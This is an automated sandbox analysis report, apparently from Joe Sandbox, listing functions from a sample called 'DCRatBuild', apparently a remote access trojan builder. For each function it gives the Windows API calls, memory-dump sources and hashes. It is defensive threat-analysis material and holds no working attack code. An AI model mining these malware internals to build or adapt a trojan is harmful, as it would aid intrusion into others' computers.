CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A30C
GetLastError.KERNEL32(?,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A329

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 16ed8b44ecd44bc79e972588eabd566ab6494dba047d43cc2c959b9ae2f177f9
Instruction ID: dc2b1c80a3dee314b7a9a54cfa985f0fb8835f826f979d86cb1b2e215ba34067
Opcode Fuzzy Hash: 16ed8b44ecd44bc79e972588eabd566ab6494dba047d43cc2c959b9ae2f177f9
Instruction Fuzzy Hash: F101D8352022106AEF21AB756C59BFE37DCEF0A780F8444D5F911E6181DB64EBC1C6BA

Function 00B3B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B3B8B8

Strings

, xrefs: 00B3B8FD

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 8f304d9c9c1a47c291c92c40c249d955d675ba5294d05d0f7bc47568902f8acf
Instruction ID: 42a0354dfa1ba54a34168ac8eeddf48293ba56edad2aaeebc6446f8ae35a54ac
Opcode Fuzzy Hash: 8f304d9c9c1a47c291c92c40c249d955d675ba5294d05d0f7bc47568902f8acf
Instruction Fuzzy Hash: BF41F57050428C9ADF228E688C84FF6BBE9EF45304F2405EDE69A87146D735AA458B60

Function 00B3AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00B3AFDD

Strings

LCMapStringEx, xrefs: 00B3AF7D, 00B3AF87

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 41e35232210aa9e93caec50b5f5e13503615aeeab71a6318e7a89cd5f4abde0d
Instruction ID: fb881ac9c0402655b2bafdbdbe20cfe50cf3c0116824cc5d22b4325582a59cb2
Opcode Fuzzy Hash: 41e35232210aa9e93caec50b5f5e13503615aeeab71a6318e7a89cd5f4abde0d
Instruction Fuzzy Hash: DC01E236644219BBCF02AF90DC06DEE7FA2FF09760F554194FE1866160CB728A31EB91

Function 00B3AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B3A56F), ref: 00B3AF55

Strings

InitializeCriticalSectionEx, xrefs: 00B3AF1B, 00B3AF25

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 9e31f9ac5ce8e8b0464630cbc6f9852c76e86e62903942a7e16e2dfddd831a7a
Instruction ID: 5b5743325570c697ec25f0a84590d535ba17bfa1fab13cf2d5274b3471b29ddd
Opcode Fuzzy Hash: 9e31f9ac5ce8e8b0464630cbc6f9852c76e86e62903942a7e16e2dfddd831a7a
Instruction Fuzzy Hash: 05F09035685218BBCB015F50DC06CAD7FE1EF05B11B5040A4FC0896260DF714F10EB85

Function 00B3ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00B3ADEE

Strings

FlsAlloc, xrefs: 00B3ADC0, 00B3ADCA

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 0acee3b81360fc766f983c88314a030f71b9beebd89f8058056cfb819780bfed
Instruction ID: 512a4818438e027cb5dc71e7e1716c9db0f9327439eaad32df46d6315cac85fa
Opcode Fuzzy Hash: 0acee3b81360fc766f983c88314a030f71b9beebd89f8058056cfb819780bfed
Instruction Fuzzy Hash: 90E0AB307882287BC300AB24DC02D2EBBD0EB45B21F2000E8FC04A3250CF704F00D6C6

Function 00B2EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2EAF9

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Strings

3Ro, xrefs: 00B2EAE7, 00B2EAF3

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: 89ac2ce7b05b3b4a2dcb1b3e6e2eec7a944b75e0ef125a59e0f9716a6602ca1d
Instruction ID: 9227bfa2322882b8be4fcee960bf2e01e19a55584e24eddfe4e5a4a286b6e831
Opcode Fuzzy Hash: 89ac2ce7b05b3b4a2dcb1b3e6e2eec7a944b75e0ef125a59e0f9716a6602ca1d
Instruction Fuzzy Hash: F0B092862AA0627C210462022D42C3601C8C082F90321C0AEF42889092A88189012431

Function 00B3BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00B3B7BB: GetOEMCP.KERNEL32(00000000,?,?,00B3BA44,?), ref: 00B3B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B3BA89,?,00000000), ref: 00B3BC64
GetCPInfo.KERNEL32(00000000,00B3BA89,?,?,?,00B3BA89,?,00000000), ref: 00B3BC77

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: f2af95641bcc1b7ef917ce9bdf5a641be8e9974e8645686b330fe7b677e0ee7a
Instruction ID: 4be98350c81b3ffde2770475babbef8cf90d11f3777ce67c731c228e6eb65ee3
Opcode Fuzzy Hash: f2af95641bcc1b7ef917ce9bdf5a641be8e9974e8645686b330fe7b677e0ee7a
Instruction Fuzzy Hash: 77511474A002459EDB24CF75C881EBABBF5EF41300F3844FED6968B295DB359A46CB90

Function 00B19A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00B19A50,?,?,00000000,?,?,00B18CBC,?), ref: 00B19BAB
GetLastError.KERNEL32(?,00000000,00B18411,-00009570,00000000,000007F3), ref: 00B19BB6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: aec6effe37de4977143646e9a23a657d699af16b230784d93529109e6c17dc7e
Instruction ID: 6b311a14db784f69a70b14ceb38f277c2bafb7427fea91d26b832171ea7fbca0
Opcode Fuzzy Hash: aec6effe37de4977143646e9a23a657d699af16b230784d93529109e6c17dc7e
Instruction Fuzzy Hash: EB410F706083818FEB24CF14E5A44EBB7E5FFD5720F588AADE88183260D770ED888A51

Function 00B3BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00B397E5: GetLastError.KERNEL32(?,00B51030,00B34674,00B51030,?,?,00B33F73,00000050,?,00B51030,00000200), ref: 00B397E9
Part of subcall function 00B397E5: _free.LIBCMT ref: 00B3981C
Part of subcall function 00B397E5: SetLastError.KERNEL32(00000000,?,00B51030,00000200), ref: 00B3985D
Part of subcall function 00B397E5: _abort.LIBCMT ref: 00B39863

Part of subcall function 00B3BB4E: _abort.LIBCMT ref: 00B3BB80
Part of subcall function 00B3BB4E: _free.LIBCMT ref: 00B3BBB4

Part of subcall function 00B3B7BB: GetOEMCP.KERNEL32(00000000,?,?,00B3BA44,?), ref: 00B3B7E6

_free.LIBCMT ref: 00B3BA9F
_free.LIBCMT ref: 00B3BAD5

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 2e86d0df23d06c1eb2670903f2ab87626e00f9522a5a67f3412cf6657d5ab01c
Instruction ID: c4082d6e0c8752eded5f3e99d39c936f0758a34e946718249cc5ec67e0e73583
Opcode Fuzzy Hash: 2e86d0df23d06c1eb2670903f2ab87626e00f9522a5a67f3412cf6657d5ab01c
Instruction Fuzzy Hash: 4B319F31904609AFDB10EFA8D441FA9B7F5EF41320F3540D9EA14AB2A6EF729E40DB50

Function 00B11E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B11E55

Part of subcall function 00B13BBA: __EH_prolog.LIBCMT ref: 00B13BBF

_wcslen.LIBCMT ref: 00B11EFD

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 16321fbd47665de1381f0f82627506e393727e5757660e35405a6088d1935dc3
Instruction ID: 97d1739f06d64f6037848b0b28aea68c928f432205b1f3689c1dbb9aee3f813d
Opcode Fuzzy Hash: 16321fbd47665de1381f0f82627506e393727e5757660e35405a6088d1935dc3
Instruction Fuzzy Hash: B3316B729042199FCF11DF98D945AEEBBF6EF48300F6008A9F545A7251C7325E40CB60

Function 00B19DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B173BC,?,?,?,00000000), ref: 00B19DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00B19E70

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: e9a9bd73e1c70de69a3b549742c0be88e2c20fb8ba3d45dd2b711c956db56a96
Instruction ID: 3ee7204a6ee85569a901d1294b10868d52a53db9d37e1b8f288f94b47f7c6158
Opcode Fuzzy Hash: e9a9bd73e1c70de69a3b549742c0be88e2c20fb8ba3d45dd2b711c956db56a96
Instruction Fuzzy Hash: 0421D032248285AFC714CF34D8A1AABBBE4EF55704F4849ACF4C587181D329EA4D9B61

Function 00B1966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B19F27,?,?,00B1771A), ref: 00B196E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B19F27,?,?,00B1771A), ref: 00B19716

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6eeef809716d6d6e93ae6a6fdf6069f128f961714d4616d4ede628254a121525
Instruction ID: d46fd81bc2eb89648c34f91420b135af5eacb481dfadc1e0ecdd99f979be3463
Opcode Fuzzy Hash: 6eeef809716d6d6e93ae6a6fdf6069f128f961714d4616d4ede628254a121525
Instruction Fuzzy Hash: DD21D071504384AFE3308A65CC89FF7B7DCEB59720F900A69FAD5C25D1C774A8849A72

Function 00B19E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B19EC7
GetLastError.KERNEL32 ref: 00B19ED4

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 6271c938bdff32ca7af04b469a37c2e01f1569adb89addd2e622b41579bbc353
Instruction ID: 555a0ab5850278a59e8e344d89000be63eb4c7e74059f0cc778a011b2826b9f7
Opcode Fuzzy Hash: 6271c938bdff32ca7af04b469a37c2e01f1569adb89addd2e622b41579bbc353
Instruction Fuzzy Hash: 1C11C632600640ABD724C628C890BE6B7E9EB45360F944AA9E553D36D0D770BD89C760

Function 00B38E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B38E75

Part of subcall function 00B38E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B3CA2C,00000000,?,00B36CBE,?,00000008,?,00B391E0,?,?,?), ref: 00B38E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00B51098,00B117CE,?,?,00000007,?,?,?,00B113D6,?,00000000), ref: 00B38EB1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 48870b7c5d66cabfb2471f7c7dd24365c5c1dc87e0a417b91023172f32275bc4
Instruction ID: c97d001742fa646ba89eac82df5108463ed184f6b262aa080b01bc0911e7f9e6
Opcode Fuzzy Hash: 48870b7c5d66cabfb2471f7c7dd24365c5c1dc87e0a417b91023172f32275bc4
Instruction Fuzzy Hash: 09F062326053356ADB212A65AC05B6F37D8DF81F70F3441A6F818A6191DFB4DD0195A3

Function 00B2109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00B210AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00B210B2

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b5612f9b440f644e78aae37afb1faa052133f310e4323e6d9c8ddb990c424acd
Instruction ID: 0d99223beeb122318052fde612094937ef7d69e87b732ca8b89f1b7c63093875
Opcode Fuzzy Hash: b5612f9b440f644e78aae37afb1faa052133f310e4323e6d9c8ddb990c424acd
Instruction Fuzzy Hash: 66E0D836B00155A7CF0D87B9AC059EF73EDEA5420431486B6E407D3201F930DF414660

Function 00B1A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B1A325,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A501

Part of subcall function 00B1BB03: _wcslen.LIBCMT ref: 00B1BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B1A325,?,?,?,00B1A175,?,00000001,00000000,?,?), ref: 00B1A532

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: b55aeafb2829ee67ddcfbdf99c833c4d027065ac406a1c35356b9e77ce10efdc
Instruction ID: 60516d32b0b07fa55e0f6c1145ee7c3167ab32f472e2f3480e1440a195830cd7
Opcode Fuzzy Hash: b55aeafb2829ee67ddcfbdf99c833c4d027065ac406a1c35356b9e77ce10efdc
Instruction Fuzzy Hash: 9EF0A932200209BBDF01AF60DC41FDA37ADFF14785F8884A0B848E6260DB31DBD8EA10

Function 00B1A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00B1977F,?,?,00B195CF,?,?,?,?,?,00B42641,000000FF), ref: 00B1A1F1

Part of subcall function 00B1BB03: _wcslen.LIBCMT ref: 00B1BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B1977F,?,?,00B195CF,?,?,?,?,?,00B42641), ref: 00B1A21F

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 55f5f2b81dfaf6bae947a9498b08101675ced193ba8835d62668d4abdc5b3f01
Instruction ID: bc178915e3d1d0b5e358742f0dbb5f4895df3a61de762630b643df6a10ca4a51
Opcode Fuzzy Hash: 55f5f2b81dfaf6bae947a9498b08101675ced193ba8835d62668d4abdc5b3f01
